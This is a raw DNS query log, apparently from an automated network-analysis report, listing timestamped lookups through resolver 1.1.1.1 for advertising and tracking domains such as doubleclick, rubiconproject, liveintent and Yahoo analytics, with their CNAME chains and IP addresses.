                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.012073994 CEST1.1.1.1192.168.2.40x2bd7No error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com18.200.94.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.012073994 CEST1.1.1.1192.168.2.40x2bd7No error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com34.250.232.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.012073994 CEST1.1.1.1192.168.2.40x2bd7No error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com54.154.112.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.012073994 CEST1.1.1.1192.168.2.40x2bd7No error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com63.34.41.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.012073994 CEST1.1.1.1192.168.2.40x2bd7No error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com54.229.0.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.012774944 CEST1.1.1.1192.168.2.40x2386No error (0)fw.adsafeprotected.comiefw.adsafeprotected.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.012774944 CEST1.1.1.1192.168.2.40x2386No error (0)iefw.adsafeprotected.comfirewall-external-2134955858.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.098720074 CEST1.1.1.1192.168.2.40xd815No error (0)ad.doubleclick.net142.250.185.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.098850012 CEST1.1.1.1192.168.2.40xde3No error (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.553623915 CEST1.1.1.1192.168.2.40x4af7No error (0)geo.yahoo.comgeo-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.553623915 CEST1.1.1.1192.168.2.40x4af7No error (0)geo-atsv2.media.g03.yahoodns.net188.125.72.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.554541111 CEST1.1.1.1192.168.2.40x3570No error (0)geo.yahoo.comgeo-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.597892046 CEST1.1.1.1192.168.2.40x6bdeNo error (0)ups.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.597892046 CEST1.1.1.1192.168.2.40x6bdeNo error (0)dcs-ups.g03.yahoodns.netprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.597892046 CEST1.1.1.1192.168.2.40x6bdeNo error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.597892046 CEST1.1.1.1192.168.2.40x6bdeNo error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.597892046 CEST1.1.1.1192.168.2.40x6bdeNo error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.71.149.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.597892046 CEST1.1.1.1192.168.2.40x6bdeNo error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.75.62.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.597913027 CEST1.1.1.1192.168.2.40xdea9No error (0)ups.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.597913027 CEST1.1.1.1192.168.2.40xdea9No error (0)dcs-ups.g03.yahoodns.netprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.597913027 CEST1.1.1.1192.168.2.40xdea9No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.597913027 CEST1.1.1.1192.168.2.40xdea9No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.619713068 CEST1.1.1.1192.168.2.40x5629No error (0)as.jivox.comas.jivox.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.636480093 CEST1.1.1.1192.168.2.40xe25bNo error (0)as.jivox.comas.jivox.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.300679922 CEST1.1.1.1192.168.2.40x5b5cNo error (0)pm.w55c.netcdn.w55c.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.300771952 CEST1.1.1.1192.168.2.40xeff8No error (0)a.tribalfusion.com104.18.37.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.300771952 CEST1.1.1.1192.168.2.40xeff8No error (0)a.tribalfusion.com172.64.150.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.301321983 CEST1.1.1.1192.168.2.40x3abdNo error (0)pm.w55c.netcdn.w55c.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.301321983 CEST1.1.1.1192.168.2.40x3abdNo error (0)cdn.w55c.net3.72.171.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.301321983 CEST1.1.1.1192.168.2.40x3abdNo error (0)cdn.w55c.net3.67.66.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.301321983 CEST1.1.1.1192.168.2.40x3abdNo error (0)cdn.w55c.net18.159.179.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.301321983 CEST1.1.1.1192.168.2.40x3abdNo error (0)cdn.w55c.net3.69.4.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.301691055 CEST1.1.1.1192.168.2.40x86aaNo error (0)a.tribalfusion.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.303613901 CEST1.1.1.1192.168.2.40xdb14No error (0)www.temu.comtemu-gtm.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.304778099 CEST1.1.1.1192.168.2.40x8d0fNo error (0)www.temu.comtemu-gtm.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.304778099 CEST1.1.1.1192.168.2.40x8d0fNo error (0)gw-c-eu-isp.temu.com20.47.117.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.304778099 CEST1.1.1.1192.168.2.40x8d0fNo error (0)gw-c-eu-isp.temu.com20.157.217.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.304778099 CEST1.1.1.1192.168.2.40x8d0fNo error (0)gw-c-eu-isp.temu.com20.157.217.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.304778099 CEST1.1.1.1192.168.2.40x8d0fNo error (0)gw-c-eu-isp.temu.com20.157.119.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.329233885 CEST1.1.1.1192.168.2.40xeb00No error (0)dt.adsafeprotected.comdt-external-217593033.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.329233885 CEST1.1.1.1192.168.2.40xeb00No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com3.210.154.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.329233885 CEST1.1.1.1192.168.2.40xeb00No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com18.211.27.255A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.329233885 CEST1.1.1.1192.168.2.40xeb00No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com34.234.52.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.329233885 CEST1.1.1.1192.168.2.40xeb00No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com3.223.184.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.329233885 CEST1.1.1.1192.168.2.40xeb00No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com35.168.245.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.329233885 CEST1.1.1.1192.168.2.40xeb00No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com3.230.214.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.329233885 CEST1.1.1.1192.168.2.40xeb00No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com44.215.254.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.329233885 CEST1.1.1.1192.168.2.40xeb00No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com52.206.19.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.331324100 CEST1.1.1.1192.168.2.40xe8adNo error (0)dt.adsafeprotected.comdt-external-217593033.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.334184885 CEST1.1.1.1192.168.2.40x863bNo error (0)cm.g.doubleclick.net142.250.186.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.335920095 CEST1.1.1.1192.168.2.40xe5c5No error (0)contextual.media.net95.101.148.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.337274075 CEST1.1.1.1192.168.2.40x32c3No error (0)sync.teads.tvsync.teads.tv.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.337913990 CEST1.1.1.1192.168.2.40x9367No error (0)sync.teads.tvsync.teads.tv.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.379714966 CEST1.1.1.1192.168.2.40xf623No error (0)as.jivox.comas.jivox.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.392164946 CEST1.1.1.1192.168.2.40x1713No error (0)as.jivox.comas.jivox.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.212132931 CEST1.1.1.1192.168.2.40xc920No error (0)eus.rubiconproject.comeus.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.212305069 CEST1.1.1.1192.168.2.40x55ebNo error (0)eus.rubiconproject.comeus.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.224215984 CEST1.1.1.1192.168.2.40xc598No error (0)playercdn.jivox.complayercdn.jivox.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.224582911 CEST1.1.1.1192.168.2.40x85fdNo error (0)playercdn.jivox.complayercdn.jivox.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.224741936 CEST1.1.1.1192.168.2.40xf7e0No error (0)s.tribalfusion.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.224879026 CEST1.1.1.1192.168.2.40xa76No error (0)s.tribalfusion.com104.18.37.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.224879026 CEST1.1.1.1192.168.2.40xa76No error (0)s.tribalfusion.com172.64.150.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.351466894 CEST1.1.1.1192.168.2.40x704fNo error (0)events-ssc.33across.com34.117.239.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.891115904 CEST1.1.1.1192.168.2.40x9e00No error (0)s.tribalfusion.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.892513037 CEST1.1.1.1192.168.2.40x305cNo error (0)s.tribalfusion.com104.18.37.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.892513037 CEST1.1.1.1192.168.2.40x305cNo error (0)s.tribalfusion.com172.64.150.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.946513891 CEST1.1.1.1192.168.2.40xa794No error (0)playercdn.jivox.complayercdn.jivox.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.957209110 CEST1.1.1.1192.168.2.40x6ba4No error (0)playercdn.jivox.complayercdn.jivox.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.996711969 CEST1.1.1.1192.168.2.40x62d1No error (0)events-ssc.33across.com34.117.239.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:41.420192957 CEST1.1.1.1192.168.2.40xdae8No error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:41.420205116 CEST1.1.1.1192.168.2.40x4eb1No error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:42.506063938 CEST1.1.1.1192.168.2.40xe9d9No error (0)pixel-us-east.rubiconproject.compixel-us-east.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:42.507277966 CEST1.1.1.1192.168.2.40xbc67No error (0)pixel-us-east.rubiconproject.compixel-us-east.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:43.617744923 CEST1.1.1.1192.168.2.40x7f01No error (0)htlb.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:43.617744923 CEST1.1.1.1192.168.2.40x7f01No error (0)htlb.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:43.620457888 CEST1.1.1.1192.168.2.40x164aNo error (0)htlb.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:44.325608969 CEST1.1.1.1192.168.2.40xa486No error (0)prebid.media.net34.120.63.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:46.864856958 CEST1.1.1.1192.168.2.40x2939No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:46.864856958 CEST1.1.1.1192.168.2.40x2939No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:46.864856958 CEST1.1.1.1192.168.2.40x2939No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:46.864938021 CEST1.1.1.1192.168.2.40x9840No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:47.990292072 CEST1.1.1.1192.168.2.40xd84aNo error (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:47.990612030 CEST1.1.1.1192.168.2.40x1a39No error (0)securepubads.g.doubleclick.net142.250.184.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:48.534574986 CEST1.1.1.1192.168.2.40xf472No error (0)ox-rtb-europe-west1.openx.net35.241.44.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:48.535331964 CEST1.1.1.1192.168.2.40xd6baNo error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:48.535495996 CEST1.1.1.1192.168.2.40x491bNo error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:48.535495996 CEST1.1.1.1192.168.2.40x491bNo error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:48.535495996 CEST1.1.1.1192.168.2.40x491bNo error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:49.262947083 CEST1.1.1.1192.168.2.40x2d3dNo error (0)ox-rtb-europe-west1.openx.net35.241.44.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:49.537015915 CEST1.1.1.1192.168.2.40xb7bcName error (3)cs.lkqd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:49.539071083 CEST1.1.1.1192.168.2.40x209aName error (3)cs.lkqd.netnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:49.550673008 CEST1.1.1.1192.168.2.40x66f6Name error (3)cs.lkqd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.523323059 CEST1.1.1.1192.168.2.40xc743Name error (3)cs.lkqd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.524219036 CEST1.1.1.1192.168.2.40xafebName error (3)cs.lkqd.netnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.552632093 CEST1.1.1.1192.168.2.40x8946No error (0)i.liadm.comidaas-ext.cph.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.552632093 CEST1.1.1.1192.168.2.40x8946No error (0)idaas-ext.cph.liveintent.com3.215.157.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.552632093 CEST1.1.1.1192.168.2.40x8946No error (0)idaas-ext.cph.liveintent.com54.227.194.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.552632093 CEST1.1.1.1192.168.2.40x8946No error (0)idaas-ext.cph.liveintent.com18.205.228.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.552632093 CEST1.1.1.1192.168.2.40x8946No error (0)idaas-ext.cph.liveintent.com52.206.177.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.552632093 CEST1.1.1.1192.168.2.40x8946No error (0)idaas-ext.cph.liveintent.com52.86.99.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.552632093 CEST1.1.1.1192.168.2.40x8946No error (0)idaas-ext.cph.liveintent.com52.205.228.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.552632093 CEST1.1.1.1192.168.2.40x8946No error (0)idaas-ext.cph.liveintent.com44.194.57.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.552632093 CEST1.1.1.1192.168.2.40x8946No error (0)idaas-ext.cph.liveintent.com34.192.210.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.552665949 CEST1.1.1.1192.168.2.40xdab6No error (0)i.liadm.comidaas-ext.cph.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.552695990 CEST1.1.1.1192.168.2.40x3c66No error (0)aa.agkn.comActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.552695990 CEST1.1.1.1192.168.2.40x3c66No error (0)ActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.com18.197.252.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.552695990 CEST1.1.1.1192.168.2.40x3c66No error (0)ActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.com52.58.104.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.554030895 CEST1.1.1.1192.168.2.40x46e3No error (0)aa.agkn.comActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.556961060 CEST1.1.1.1192.168.2.40x6a1dNo error (0)stags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.567998886 CEST1.1.1.1192.168.2.40xe07eNo error (0)stags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:51.443535089 CEST1.1.1.1192.168.2.40x29b0No error (0)ad.doubleclick.net142.250.186.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:51.443551064 CEST1.1.1.1192.168.2.40xa01No error (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.349756002 CEST1.1.1.1192.168.2.40x6636No error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.350107908 CEST1.1.1.1192.168.2.40x7621No error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.350107908 CEST1.1.1.1192.168.2.40x7621No error (0)tagr-pixel-nginx-odr-euw4.mookie1.com34.160.236.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.354938030 CEST1.1.1.1192.168.2.40xb044No error (0)aa.agkn.comActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.354938030 CEST1.1.1.1192.168.2.40xb044No error (0)ActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.com52.58.104.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.354938030 CEST1.1.1.1192.168.2.40xb044No error (0)ActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.com18.197.252.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.356288910 CEST1.1.1.1192.168.2.40xb0bbNo error (0)aa.agkn.comActivationEdge-activation-212358690.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.440737963 CEST1.1.1.1192.168.2.40x11d4No error (0)thrtle.com34.236.178.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.440737963 CEST1.1.1.1192.168.2.40x11d4No error (0)thrtle.com44.210.232.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.440737963 CEST1.1.1.1192.168.2.40x11d4No error (0)thrtle.com3.227.42.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.440737963 CEST1.1.1.1192.168.2.40x11d4No error (0)thrtle.com52.1.52.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.440737963 CEST1.1.1.1192.168.2.40x11d4No error (0)thrtle.com23.23.29.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.440737963 CEST1.1.1.1192.168.2.40x11d4No error (0)thrtle.com3.209.171.119A (IP address)IN (0x0001)false
